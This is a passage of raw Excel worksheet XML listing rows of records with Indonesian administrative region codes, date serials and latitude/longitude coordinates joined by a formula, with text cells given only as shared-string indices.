      <c r="C3856" t="s">
        <v>12796</v>
      </c>
      <c r="D3856" t="s">
        <v>22</v>
      </c>
      <c r="E3856" t="s">
        <v>23</v>
      </c>
      <c r="F3856" t="s">
        <v>12797</v>
      </c>
      <c r="G3856" t="s">
        <v>12798</v>
      </c>
      <c r="H3856" t="s">
        <v>26</v>
      </c>
      <c r="I3856" t="s">
        <v>27</v>
      </c>
      <c r="J3856" t="s">
        <v>1656</v>
      </c>
      <c r="L3856" t="s">
        <v>12799</v>
      </c>
      <c r="M3856">
        <v>3173080003</v>
      </c>
      <c r="N3856">
        <v>3173080</v>
      </c>
      <c r="O3856">
        <v>3173</v>
      </c>
      <c r="P3856">
        <v>31</v>
      </c>
      <c r="Q3856" t="s">
        <v>157</v>
      </c>
      <c r="R3856" t="s">
        <v>157</v>
      </c>
      <c r="S3856" t="s">
        <v>62</v>
      </c>
      <c r="T3856" t="s">
        <v>33</v>
      </c>
      <c r="U3856" s="5">
        <v>106827149391</v>
      </c>
      <c r="V3856" s="5" t="s">
        <v>17910</v>
      </c>
      <c r="W3856" s="5">
        <v>-6175392975</v>
      </c>
      <c r="X3856" t="s">
        <v>21641</v>
      </c>
      <c r="Y3856" t="str">
        <f t="shared" si="60"/>
        <v>-6.175392975,106.827149391</v>
      </c>
    </row>
    <row r="3857" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3857">
        <v>297007</v>
      </c>
      <c r="B3857" s="1">
        <v>44446</v>
      </c>
      <c r="C3857" t="s">
        <v>12800</v>
      </c>
      <c r="D3857" t="s">
        <v>22</v>
      </c>
      <c r="E3857" t="s">
        <v>23</v>
      </c>
      <c r="F3857" t="s">
        <v>12801</v>
      </c>
      <c r="G3857" t="s">
        <v>12802</v>
      </c>
      <c r="H3857" t="s">
        <v>26</v>
      </c>
      <c r="I3857" t="s">
        <v>27</v>
      </c>
      <c r="J3857" t="s">
        <v>7171</v>
      </c>
      <c r="L3857" t="s">
        <v>12803</v>
      </c>
      <c r="M3857">
        <v>6472050005</v>
      </c>
      <c r="N3857">
        <v>6472050</v>
      </c>
      <c r="O3857">
        <v>6472</v>
      </c>
      <c r="P3857">
        <v>64</v>
      </c>
      <c r="Q3857" t="s">
        <v>12804</v>
      </c>
      <c r="R3857" t="s">
        <v>7174</v>
      </c>
      <c r="S3857" t="s">
        <v>7175</v>
      </c>
      <c r="T3857" t="s">
        <v>1308</v>
      </c>
      <c r="U3857" s="5">
        <v>117148035270</v>
      </c>
      <c r="V3857" s="5" t="s">
        <v>17925</v>
      </c>
      <c r="W3857" s="5">
        <v>-481184740</v>
      </c>
      <c r="X3857" t="s">
        <v>21656</v>
      </c>
      <c r="Y3857" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.481184740,117.148035270</v>
      </c>
    </row>
    <row r="3858" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3858">
        <v>297008</v>
      </c>
      <c r="B3858" s="1">
        <v>44446</v>
      </c>
      <c r="C3858" t="s">
        <v>12805</v>
      </c>
      <c r="D3858" t="s">
        <v>22</v>
      </c>
      <c r="E3858" t="s">
        <v>23</v>
      </c>
      <c r="F3858" t="s">
        <v>12806</v>
      </c>
      <c r="G3858" t="s">
        <v>12807</v>
      </c>
      <c r="H3858" t="s">
        <v>26</v>
      </c>
      <c r="I3858" t="s">
        <v>3603</v>
      </c>
      <c r="J3858" t="s">
        <v>7171</v>
      </c>
      <c r="L3858" t="s">
        <v>12808</v>
      </c>
      <c r="M3858">
        <v>6472050006</v>
      </c>
      <c r="N3858">
        <v>6472050</v>
      </c>
      <c r="O3858">
        <v>6472</v>
      </c>
      <c r="P3858">
        <v>64</v>
      </c>
      <c r="Q3858" t="s">
        <v>7198</v>
      </c>
      <c r="R3858" t="s">
        <v>7174</v>
      </c>
      <c r="S3858" t="s">
        <v>7175</v>
      </c>
      <c r="T3858" t="s">
        <v>1308</v>
      </c>
      <c r="U3858" s="5">
        <v>117146152115</v>
      </c>
      <c r="V3858" s="5" t="s">
        <v>17926</v>
      </c>
      <c r="W3858" s="5">
        <v>-475036255</v>
      </c>
      <c r="X3858" t="s">
        <v>21657</v>
      </c>
      <c r="Y3858" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.475036255,117.146152115</v>
      </c>
    </row>
    <row r="3859" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3859">
        <v>297009</v>
      </c>
      <c r="B3859" s="1">
        <v>44446</v>
      </c>
      <c r="C3859" t="s">
        <v>12809</v>
      </c>
      <c r="D3859" t="s">
        <v>22</v>
      </c>
      <c r="E3859" t="s">
        <v>23</v>
      </c>
      <c r="F3859" t="s">
        <v>12810</v>
      </c>
      <c r="G3859" t="s">
        <v>12811</v>
      </c>
      <c r="H3859" t="s">
        <v>26</v>
      </c>
      <c r="I3859" t="s">
        <v>2165</v>
      </c>
      <c r="J3859" t="s">
        <v>7171</v>
      </c>
      <c r="L3859" t="s">
        <v>12812</v>
      </c>
      <c r="M3859">
        <v>6472060011</v>
      </c>
      <c r="N3859">
        <v>6472060</v>
      </c>
      <c r="O3859">
        <v>6472</v>
      </c>
      <c r="P3859">
        <v>64</v>
      </c>
      <c r="Q3859" t="s">
        <v>7202</v>
      </c>
      <c r="R3859" t="s">
        <v>7203</v>
      </c>
      <c r="S3859" t="s">
        <v>7175</v>
      </c>
      <c r="T3859" t="s">
        <v>1308</v>
      </c>
      <c r="U3859" s="5">
        <v>117163221687</v>
      </c>
      <c r="V3859" s="5" t="s">
        <v>17927</v>
      </c>
      <c r="W3859" s="5">
        <v>-426914249</v>
      </c>
      <c r="X3859" t="s">
        <v>21658</v>
      </c>
      <c r="Y3859" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.426914249,117.163221687</v>
      </c>
    </row>
    <row r="3860" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3860">
        <v>297010</v>
      </c>
      <c r="B3860" s="1">
        <v>44446</v>
      </c>
      <c r="C3860" t="s">
        <v>12813</v>
      </c>
      <c r="D3860" t="s">
        <v>22</v>
      </c>
      <c r="E3860" t="s">
        <v>23</v>
      </c>
      <c r="F3860" t="s">
        <v>12814</v>
      </c>
      <c r="G3860" t="s">
        <v>12815</v>
      </c>
      <c r="H3860" t="s">
        <v>26</v>
      </c>
      <c r="I3860" t="s">
        <v>1651</v>
      </c>
      <c r="J3860" t="s">
        <v>7171</v>
      </c>
      <c r="L3860" t="s">
        <v>12816</v>
      </c>
      <c r="M3860">
        <v>6472060011</v>
      </c>
      <c r="N3860">
        <v>6472060</v>
      </c>
      <c r="O3860">
        <v>6472</v>
      </c>
      <c r="P3860">
        <v>64</v>
      </c>
      <c r="Q3860" t="s">
        <v>7202</v>
      </c>
      <c r="R3860" t="s">
        <v>7203</v>
      </c>
      <c r="S3860" t="s">
        <v>7175</v>
      </c>
      <c r="T3860" t="s">
        <v>1308</v>
      </c>
      <c r="U3860" s="5">
        <v>117167366354</v>
      </c>
      <c r="V3860" s="5" t="s">
        <v>17928</v>
      </c>
      <c r="W3860" s="5">
        <v>-427121599</v>
      </c>
      <c r="X3860" t="s">
        <v>21659</v>
      </c>
      <c r="Y3860" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.427121599,117.167366354</v>
      </c>
    </row>
    <row r="3861" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3861">
        <v>297011</v>
      </c>
      <c r="B3861" s="1">
        <v>44446</v>
      </c>
      <c r="C3861" t="s">
        <v>12817</v>
      </c>
      <c r="D3861" t="s">
        <v>22</v>
      </c>
      <c r="E3861" t="s">
        <v>23</v>
      </c>
      <c r="F3861" t="s">
        <v>12818</v>
      </c>
      <c r="G3861" t="s">
        <v>12819</v>
      </c>
      <c r="H3861" t="s">
        <v>26</v>
      </c>
      <c r="I3861" t="s">
        <v>2300</v>
      </c>
      <c r="J3861" t="s">
        <v>7171</v>
      </c>
      <c r="L3861" t="s">
        <v>12820</v>
      </c>
      <c r="M3861">
        <v>6472060011</v>
      </c>
      <c r="N3861">
        <v>6472060</v>
      </c>
      <c r="O3861">
        <v>6472</v>
      </c>
      <c r="P3861">
        <v>64</v>
      </c>
      <c r="Q3861" t="s">
        <v>7202</v>
      </c>
      <c r="R3861" t="s">
        <v>7203</v>
      </c>
      <c r="S3861" t="s">
        <v>7175</v>
      </c>
      <c r="T3861" t="s">
        <v>1308</v>
      </c>
      <c r="U3861" s="5">
        <v>117167917764</v>
      </c>
      <c r="V3861" s="5" t="s">
        <v>17929</v>
      </c>
      <c r="W3861" s="5">
        <v>-427573528</v>
      </c>
      <c r="X3861" t="s">
        <v>21660</v>
      </c>
      <c r="Y3861" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.427573528,117.167917764</v>
      </c>
    </row>
    <row r="3862" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3862">
        <v>297012</v>
      </c>
      <c r="B3862" s="1">
        <v>44446</v>
      </c>
      <c r="C3862" t="s">
        <v>12821</v>
      </c>
      <c r="D3862" t="s">
        <v>22</v>
      </c>
      <c r="E3862" t="s">
        <v>23</v>
      </c>
      <c r="F3862" t="s">
        <v>12822</v>
      </c>
      <c r="G3862" t="s">
        <v>12823</v>
      </c>
      <c r="H3862" t="s">
        <v>26</v>
      </c>
      <c r="I3862" t="s">
        <v>1710</v>
      </c>
      <c r="J3862" t="s">
        <v>7637</v>
      </c>
      <c r="L3862" t="s">
        <v>12824</v>
      </c>
      <c r="M3862">
        <v>6209050004</v>
      </c>
      <c r="N3862">
        <v>6209050</v>
      </c>
      <c r="O3862">
        <v>6209</v>
      </c>
      <c r="P3862">
        <v>62</v>
      </c>
      <c r="Q3862" t="s">
        <v>12825</v>
      </c>
      <c r="R3862" t="s">
        <v>12749</v>
      </c>
      <c r="S3862" t="s">
        <v>12733</v>
      </c>
      <c r="T3862" t="s">
        <v>7642</v>
      </c>
      <c r="U3862" s="5">
        <v>113391058194</v>
      </c>
      <c r="V3862" s="5" t="s">
        <v>17930</v>
      </c>
      <c r="W3862" s="5">
        <v>-1912223835</v>
      </c>
      <c r="X3862" t="s">
        <v>21661</v>
      </c>
      <c r="Y3862" t="str">
        <f t="shared" si="60"/>
        <v>-1.912223835,113.391058194</v>
      </c>
    </row>
    <row r="3863" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3863">
        <v>297013</v>
      </c>
      <c r="B3863" s="1">
        <v>44446</v>
      </c>
      <c r="C3863" t="s">
        <v>12826</v>
      </c>
      <c r="D3863" t="s">
        <v>22</v>
      </c>
      <c r="E3863" t="s">
        <v>23</v>
      </c>
      <c r="F3863" s="3" t="s">
        <v>12827</v>
      </c>
      <c r="H3863" t="s">
        <v>26</v>
      </c>
      <c r="I3863" t="s">
        <v>7646</v>
      </c>
      <c r="J3863" t="s">
        <v>6626</v>
      </c>
      <c r="L3863" t="s">
        <v>12828</v>
      </c>
      <c r="M3863">
        <v>7371101002</v>
      </c>
      <c r="N3863">
        <v>7371101</v>
      </c>
      <c r="O3863">
        <v>7371</v>
      </c>
      <c r="P3863">
        <v>73</v>
      </c>
      <c r="Q3863" t="s">
        <v>12829</v>
      </c>
      <c r="R3863" t="s">
        <v>8588</v>
      </c>
      <c r="S3863" t="s">
        <v>6629</v>
      </c>
      <c r="T3863" t="s">
        <v>6630</v>
      </c>
      <c r="U3863" s="5">
        <v>119477271896</v>
      </c>
      <c r="V3863" s="5" t="s">
        <v>17931</v>
      </c>
      <c r="W3863" s="5">
        <v>-5179827167</v>
      </c>
      <c r="X3863" t="s">
        <v>21662</v>
      </c>
      <c r="Y3863" t="str">
        <f t="shared" si="60"/>
        <v>-5.179827167,119.477271896</v>
      </c>
    </row>
    <row r="3864" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3864">
        <v>297014</v>
      </c>
      <c r="B3864" s="1">
        <v>44446</v>
      </c>
      <c r="C3864" t="s">
        <v>12830</v>
      </c>
      <c r="D3864" t="s">
        <v>22</v>
      </c>
      <c r="E3864" t="s">
        <v>23</v>
      </c>
      <c r="F3864" t="s">
        <v>12831</v>
      </c>
      <c r="G3864" t="s">
        <v>12832</v>
      </c>
      <c r="H3864" t="s">
        <v>26</v>
      </c>
      <c r="I3864" t="s">
        <v>137</v>
      </c>
      <c r="J3864" t="s">
        <v>1656</v>
      </c>
      <c r="M3864">
        <v>3173080003</v>
      </c>
      <c r="N3864">
        <v>3173080</v>
      </c>
      <c r="O3864">
        <v>3173</v>
      </c>
      <c r="P3864">
        <v>31</v>
      </c>
      <c r="Q3864" t="s">
        <v>157</v>
      </c>
      <c r="R3864" t="s">
        <v>157</v>
      </c>
      <c r="S3864" t="s">
        <v>62</v>
      </c>
      <c r="T3864" t="s">
        <v>33</v>
      </c>
      <c r="U3864" s="5">
        <v>106827889681</v>
      </c>
      <c r="V3864" s="5" t="s">
        <v>17932</v>
      </c>
      <c r="W3864" s="5">
        <v>-6176064969</v>
      </c>
      <c r="X3864" t="s">
        <v>21663</v>
      </c>
      <c r="Y3864" t="str">
        <f t="shared" si="60"/>
        <v>-6.176064969,106.827889681</v>
      </c>
    </row>
    <row r="3865" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3865">
        <v>297015</v>
      </c>
      <c r="B3865" s="1">
        <v>44447</v>
      </c>
      <c r="C3865" t="s">
        <v>12833</v>
      </c>
      <c r="D3865" t="s">
        <v>22</v>
      </c>
      <c r="E3865" t="s">
        <v>23</v>
      </c>
      <c r="F3865" t="s">
        <v>12834</v>
      </c>
      <c r="G3865" t="s">
        <v>12835</v>
      </c>
      <c r="H3865" t="s">
        <v>26</v>
      </c>
      <c r="I3865" t="s">
        <v>166</v>
      </c>
      <c r="J3865" t="s">
        <v>7171</v>
      </c>
      <c r="L3865" t="s">
        <v>12836</v>
      </c>
      <c r="M3865">
        <v>6472031004</v>
      </c>
      <c r="N3865">
        <v>6472031</v>
      </c>
      <c r="O3865">
        <v>6472</v>
      </c>
      <c r="P3865">
        <v>64</v>
      </c>
      <c r="Q3865" t="s">
        <v>12837</v>
      </c>
      <c r="R3865" t="s">
        <v>12685</v>
      </c>
      <c r="S3865" t="s">
        <v>7175</v>
      </c>
      <c r="T3865" t="s">
        <v>1308</v>
      </c>
      <c r="U3865" s="5">
        <v>117121489048</v>
      </c>
      <c r="V3865" s="5" t="s">
        <v>17933</v>
      </c>
      <c r="W3865" s="5">
        <v>-549570836</v>
      </c>
      <c r="X3865" t="s">
        <v>21664</v>
      </c>
      <c r="Y3865" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.549570836,117.121489048</v>
      </c>
    </row>
    <row r="3866" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3866">
        <v>297016</v>
      </c>
      <c r="B3866" s="1">
        <v>44447</v>
      </c>
      <c r="C3866" t="s">
        <v>12838</v>
      </c>
      <c r="D3866" t="s">
        <v>22</v>
      </c>
      <c r="E3866" t="s">
        <v>23</v>
      </c>
      <c r="F3866" t="s">
        <v>12839</v>
      </c>
      <c r="G3866" t="s">
        <v>12840</v>
      </c>
      <c r="H3866" t="s">
        <v>26</v>
      </c>
      <c r="I3866" t="s">
        <v>1651</v>
      </c>
      <c r="J3866" t="s">
        <v>7171</v>
      </c>
      <c r="M3866">
        <v>6472031005</v>
      </c>
      <c r="N3866">
        <v>6472031</v>
      </c>
      <c r="O3866">
        <v>6472</v>
      </c>
      <c r="P3866">
        <v>64</v>
      </c>
      <c r="Q3866" t="s">
        <v>12718</v>
      </c>
      <c r="R3866" t="s">
        <v>12685</v>
      </c>
      <c r="S3866" t="s">
        <v>7175</v>
      </c>
      <c r="T3866" t="s">
        <v>1308</v>
      </c>
      <c r="U3866" s="5">
        <v>117137829065</v>
      </c>
      <c r="V3866" s="5" t="s">
        <v>17934</v>
      </c>
      <c r="W3866" s="5">
        <v>-521253310</v>
      </c>
      <c r="X3866" t="s">
        <v>21665</v>
      </c>
      <c r="Y3866" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.521253310,117.137829065</v>
      </c>
    </row>
    <row r="3867" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3867">
        <v>297017</v>
      </c>
      <c r="B3867" s="1">
        <v>44448</v>
      </c>
      <c r="C3867" t="s">
        <v>12841</v>
      </c>
      <c r="D3867" t="s">
        <v>22</v>
      </c>
      <c r="E3867" t="s">
        <v>23</v>
      </c>
      <c r="F3867" t="s">
        <v>12842</v>
      </c>
      <c r="G3867" t="s">
        <v>12843</v>
      </c>
      <c r="H3867" t="s">
        <v>26</v>
      </c>
      <c r="I3867" t="s">
        <v>517</v>
      </c>
      <c r="J3867" t="s">
        <v>7637</v>
      </c>
      <c r="L3867" t="s">
        <v>12844</v>
      </c>
      <c r="M3867">
        <v>6209050004</v>
      </c>
      <c r="N3867">
        <v>6209050</v>
      </c>
      <c r="O3867">
        <v>6209</v>
      </c>
      <c r="P3867">
        <v>62</v>
      </c>
      <c r="Q3867" t="s">
        <v>12825</v>
      </c>
      <c r="R3867" t="s">
        <v>12749</v>
      </c>
      <c r="S3867" t="s">
        <v>12733</v>
      </c>
      <c r="T3867" t="s">
        <v>7642</v>
      </c>
      <c r="U3867" s="5">
        <v>113387059755</v>
      </c>
      <c r="V3867" s="5" t="s">
        <v>17935</v>
      </c>
      <c r="W3867" s="5">
        <v>-1896857425</v>
      </c>
      <c r="X3867" t="s">
        <v>21666</v>
      </c>
      <c r="Y3867" t="str">
        <f t="shared" si="60"/>
        <v>-1.896857425,113.387059755</v>
      </c>
    </row>
    <row r="3868" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3868">
        <v>297018</v>
      </c>
      <c r="B3868" s="1">
        <v>44448</v>
      </c>
      <c r="C3868" t="s">
        <v>12845</v>
      </c>
      <c r="D3868" t="s">
        <v>22</v>
      </c>
      <c r="E3868" t="s">
        <v>23</v>
      </c>
      <c r="F3868" t="s">
        <v>12846</v>
      </c>
      <c r="H3868" t="s">
        <v>26</v>
      </c>
      <c r="I3868" t="s">
        <v>886</v>
      </c>
      <c r="J3868" t="s">
        <v>7637</v>
      </c>
      <c r="L3868" t="s">
        <v>12847</v>
      </c>
      <c r="M3868">
        <v>6209070012</v>
      </c>
      <c r="N3868">
        <v>6209070</v>
      </c>
      <c r="O3868">
        <v>6209</v>
      </c>
      <c r="P3868">
        <v>62</v>
      </c>
      <c r="Q3868" t="s">
        <v>12848</v>
      </c>
      <c r="R3868" t="s">
        <v>12849</v>
      </c>
      <c r="S3868" t="s">
        <v>12733</v>
      </c>
      <c r="T3868" t="s">
        <v>7642</v>
      </c>
      <c r="U3868" s="5">
        <v>113290334344</v>
      </c>
      <c r="V3868" s="5" t="s">
        <v>17936</v>
      </c>
      <c r="W3868" s="5">
        <v>-1499580573</v>
      </c>
      <c r="X3868" t="s">
        <v>21667</v>
      </c>
      <c r="Y3868" t="str">
        <f t="shared" si="60"/>
        <v>-1.499580573,113.290334344</v>
      </c>
    </row>
    <row r="3869" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3869">
        <v>297019</v>
      </c>
      <c r="B3869" s="1">
        <v>44448</v>
      </c>
      <c r="C3869" t="s">
        <v>12850</v>
      </c>
      <c r="D3869" t="s">
        <v>22</v>
      </c>
      <c r="E3869" t="s">
        <v>23</v>
      </c>
      <c r="F3869" t="s">
        <v>12851</v>
      </c>
      <c r="G3869" t="s">
        <v>12852</v>
      </c>
      <c r="H3869" t="s">
        <v>26</v>
      </c>
      <c r="I3869" t="s">
        <v>3275</v>
      </c>
      <c r="J3869" t="s">
        <v>7637</v>
      </c>
      <c r="L3869" t="s">
        <v>12853</v>
      </c>
      <c r="M3869">
        <v>6201050008</v>
      </c>
      <c r="N3869">
        <v>6201050</v>
      </c>
      <c r="O3869">
        <v>6201</v>
      </c>
      <c r="P3869">
        <v>62</v>
      </c>
      <c r="Q3869" t="s">
        <v>9444</v>
      </c>
      <c r="R3869" t="s">
        <v>7640</v>
      </c>
      <c r="S3869" t="s">
        <v>7641</v>
      </c>
      <c r="T3869" t="s">
        <v>7642</v>
      </c>
      <c r="U3869" s="5">
        <v>111629918218</v>
      </c>
      <c r="V3869" s="5" t="s">
        <v>17937</v>
      </c>
      <c r="W3869" s="5">
        <v>-2684024356</v>
      </c>
      <c r="X3869" t="s">
        <v>21668</v>
      </c>
      <c r="Y3869" t="str">
        <f t="shared" si="60"/>
        <v>-2.684024356,111.629918218</v>
      </c>
    </row>
    <row r="3870" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3870">
        <v>297020</v>
      </c>
      <c r="B3870" s="1">
        <v>44448</v>
      </c>
      <c r="C3870" t="s">
        <v>12854</v>
      </c>
      <c r="D3870" t="s">
        <v>2648</v>
      </c>
      <c r="E3870" t="s">
        <v>23</v>
      </c>
      <c r="G3870" t="s">
        <v>12855</v>
      </c>
      <c r="H3870" t="s">
        <v>26</v>
      </c>
      <c r="J3870" t="s">
        <v>12620</v>
      </c>
      <c r="L3870" t="s">
        <v>12856</v>
      </c>
      <c r="M3870">
        <v>3175060002</v>
      </c>
      <c r="N3870">
        <v>3175060</v>
      </c>
      <c r="O3870">
        <v>3175</v>
      </c>
      <c r="P3870">
        <v>31</v>
      </c>
      <c r="Q3870" t="s">
        <v>2674</v>
      </c>
      <c r="R3870" t="s">
        <v>2279</v>
      </c>
      <c r="S3870" t="s">
        <v>547</v>
      </c>
      <c r="T3870" t="s">
        <v>33</v>
      </c>
      <c r="U3870" s="5">
        <v>106957169000</v>
      </c>
      <c r="V3870" s="5" t="s">
        <v>17938</v>
      </c>
      <c r="W3870" s="5">
        <v>-6149006000</v>
      </c>
      <c r="X3870" t="s">
        <v>21669</v>
      </c>
      <c r="Y3870" t="str">
        <f t="shared" si="60"/>
        <v>-6.149006000,106.957169000</v>
      </c>
    </row>
    <row r="3871" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3871">
        <v>297032</v>
      </c>
      <c r="B3871" s="1">
        <v>44449</v>
      </c>
      <c r="C3871" t="s">
        <v>12857</v>
      </c>
      <c r="D3871" t="s">
        <v>22</v>
      </c>
      <c r="E3871" t="s">
        <v>23</v>
      </c>
      <c r="F3871" t="s">
        <v>12858</v>
      </c>
      <c r="H3871" t="s">
        <v>26</v>
      </c>
      <c r="I3871" t="s">
        <v>1633</v>
      </c>
      <c r="J3871" t="s">
        <v>7637</v>
      </c>
      <c r="L3871" t="s">
        <v>12859</v>
      </c>
      <c r="M3871">
        <v>6201050006</v>
      </c>
      <c r="N3871">
        <v>6201050</v>
      </c>
      <c r="O3871">
        <v>6201</v>
      </c>
      <c r="P3871">
        <v>62</v>
      </c>
      <c r="Q3871" t="s">
        <v>12860</v>
      </c>
      <c r="R3871" t="s">
        <v>7640</v>
      </c>
      <c r="S3871" t="s">
        <v>7641</v>
      </c>
      <c r="T3871" t="s">
        <v>7642</v>
      </c>
      <c r="U3871" s="5">
        <v>111616609097</v>
      </c>
      <c r="V3871" s="5" t="s">
        <v>17939</v>
      </c>
      <c r="W3871" s="5">
        <v>-2673577851</v>
      </c>
      <c r="X3871" t="s">
        <v>21670</v>
      </c>
      <c r="Y3871" t="str">
        <f t="shared" si="60"/>
        <v>-2.673577851,111.616609097</v>
      </c>
    </row>
    <row r="3872" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3872">
        <v>297038</v>
      </c>
      <c r="B3872" s="1">
        <v>44449</v>
      </c>
      <c r="C3872" t="s">
        <v>12861</v>
      </c>
      <c r="D3872" t="s">
        <v>22</v>
      </c>
      <c r="E3872" t="s">
        <v>23</v>
      </c>
      <c r="F3872" t="s">
        <v>12862</v>
      </c>
      <c r="G3872" t="s">
        <v>12863</v>
      </c>
      <c r="H3872" t="s">
        <v>26</v>
      </c>
      <c r="I3872" t="s">
        <v>27</v>
      </c>
      <c r="J3872" t="s">
        <v>7171</v>
      </c>
      <c r="L3872" t="s">
        <v>12864</v>
      </c>
      <c r="M3872">
        <v>6472060011</v>
      </c>
      <c r="N3872">
        <v>6472060</v>
      </c>
      <c r="O3872">
        <v>6472</v>
      </c>
      <c r="P3872">
        <v>64</v>
      </c>
      <c r="Q3872" t="s">
        <v>7202</v>
      </c>
      <c r="R3872" t="s">
        <v>7203</v>
      </c>
      <c r="S3872" t="s">
        <v>7175</v>
      </c>
      <c r="T3872" t="s">
        <v>1308</v>
      </c>
      <c r="U3872" s="5">
        <v>117167163234</v>
      </c>
      <c r="V3872" s="5" t="s">
        <v>17940</v>
      </c>
      <c r="W3872" s="5">
        <v>-427229285</v>
      </c>
      <c r="X3872" t="s">
        <v>21671</v>
      </c>
      <c r="Y3872" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.427229285,117.167163234</v>
      </c>
    </row>
    <row r="3873" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3873">
        <v>297039</v>
      </c>
      <c r="B3873" s="1">
        <v>44449</v>
      </c>
      <c r="C3873" t="s">
        <v>12865</v>
      </c>
      <c r="D3873" t="s">
        <v>22</v>
      </c>
      <c r="E3873" t="s">
        <v>23</v>
      </c>
      <c r="F3873" t="s">
        <v>12866</v>
      </c>
      <c r="H3873" t="s">
        <v>7086</v>
      </c>
      <c r="I3873" t="s">
        <v>7733</v>
      </c>
      <c r="J3873" t="s">
        <v>7277</v>
      </c>
      <c r="L3873" t="s">
        <v>12867</v>
      </c>
      <c r="M3873">
        <v>5103010001</v>
      </c>
      <c r="N3873">
        <v>5103010</v>
      </c>
      <c r="O3873">
        <v>5103</v>
      </c>
      <c r="P3873">
        <v>51</v>
      </c>
      <c r="Q3873" t="s">
        <v>9584</v>
      </c>
      <c r="R3873" t="s">
        <v>9585</v>
      </c>
      <c r="S3873" t="s">
        <v>7281</v>
      </c>
      <c r="T3873" t="s">
        <v>7282</v>
      </c>
      <c r="U3873" s="5">
        <v>115123672386</v>
      </c>
      <c r="V3873" s="5" t="s">
        <v>17941</v>
      </c>
      <c r="W3873" s="5">
        <v>-8803950791</v>
      </c>
      <c r="X3873" t="s">
        <v>21672</v>
      </c>
      <c r="Y3873" t="str">
        <f t="shared" si="60"/>
        <v>-8.803950791,115.123672386</v>
      </c>
    </row>
    <row r="3874" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3874">
        <v>297040</v>
      </c>
      <c r="B3874" s="1">
        <v>44451</v>
      </c>
      <c r="C3874" t="s">
        <v>12868</v>
      </c>
      <c r="D3874" t="s">
        <v>22</v>
      </c>
      <c r="E3874" t="s">
        <v>23</v>
      </c>
      <c r="F3874" t="s">
        <v>12869</v>
      </c>
      <c r="G3874" t="s">
        <v>12870</v>
      </c>
      <c r="H3874" t="s">
        <v>26</v>
      </c>
      <c r="I3874" t="s">
        <v>1526</v>
      </c>
      <c r="J3874" t="s">
        <v>7171</v>
      </c>
      <c r="L3874" t="s">
        <v>12871</v>
      </c>
      <c r="M3874">
        <v>6472031005</v>
      </c>
      <c r="N3874">
        <v>6472031</v>
      </c>
      <c r="O3874">
        <v>6472</v>
      </c>
      <c r="P3874">
        <v>64</v>
      </c>
      <c r="Q3874" t="s">
        <v>12718</v>
      </c>
      <c r="R3874" t="s">
        <v>12685</v>
      </c>
      <c r="S3874" t="s">
        <v>7175</v>
      </c>
      <c r="T3874" t="s">
        <v>1308</v>
      </c>
      <c r="U3874" s="5">
        <v>117128763000</v>
      </c>
      <c r="V3874" s="5" t="s">
        <v>17942</v>
      </c>
      <c r="W3874" s="5">
        <v>-539044400</v>
      </c>
      <c r="X3874" t="s">
        <v>21673</v>
      </c>
      <c r="Y3874" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.539044400,117.128763000</v>
      </c>
    </row>
    <row r="3875" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3875">
        <v>297041</v>
      </c>
      <c r="B3875" s="1">
        <v>44451</v>
      </c>
      <c r="C3875" t="s">
        <v>12872</v>
      </c>
      <c r="D3875" t="s">
        <v>22</v>
      </c>
      <c r="E3875" t="s">
        <v>23</v>
      </c>
      <c r="F3875" t="s">
        <v>12873</v>
      </c>
      <c r="G3875" t="s">
        <v>12874</v>
      </c>
      <c r="H3875" t="s">
        <v>26</v>
      </c>
      <c r="I3875" t="s">
        <v>974</v>
      </c>
      <c r="J3875" t="s">
        <v>7171</v>
      </c>
      <c r="L3875" t="s">
        <v>12875</v>
      </c>
      <c r="M3875">
        <v>6472060005</v>
      </c>
      <c r="N3875">
        <v>6472060</v>
      </c>
      <c r="O3875">
        <v>6472</v>
      </c>
      <c r="P3875">
        <v>64</v>
      </c>
      <c r="Q3875" t="s">
        <v>8404</v>
      </c>
      <c r="R3875" t="s">
        <v>7203</v>
      </c>
      <c r="S3875" t="s">
        <v>7175</v>
      </c>
      <c r="T3875" t="s">
        <v>1308</v>
      </c>
      <c r="U3875" s="5">
        <v>117176252092</v>
      </c>
      <c r="V3875" s="5" t="s">
        <v>17943</v>
      </c>
      <c r="W3875" s="5">
        <v>-462242280</v>
      </c>
      <c r="X3875" t="s">
        <v>21674</v>
      </c>
      <c r="Y3875" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.462242280,117.176252092</v>
      </c>
    </row>
    <row r="3876" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3876">
        <v>297042</v>
      </c>
      <c r="B3876" s="1">
        <v>44451</v>
      </c>
      <c r="C3876" t="s">
        <v>12876</v>
      </c>
      <c r="D3876" t="s">
        <v>22</v>
      </c>
      <c r="E3876" t="s">
        <v>23</v>
      </c>
      <c r="F3876" t="s">
        <v>12877</v>
      </c>
      <c r="G3876" t="s">
        <v>12878</v>
      </c>
      <c r="H3876" t="s">
        <v>26</v>
      </c>
      <c r="I3876" t="s">
        <v>1595</v>
      </c>
      <c r="J3876" t="s">
        <v>7171</v>
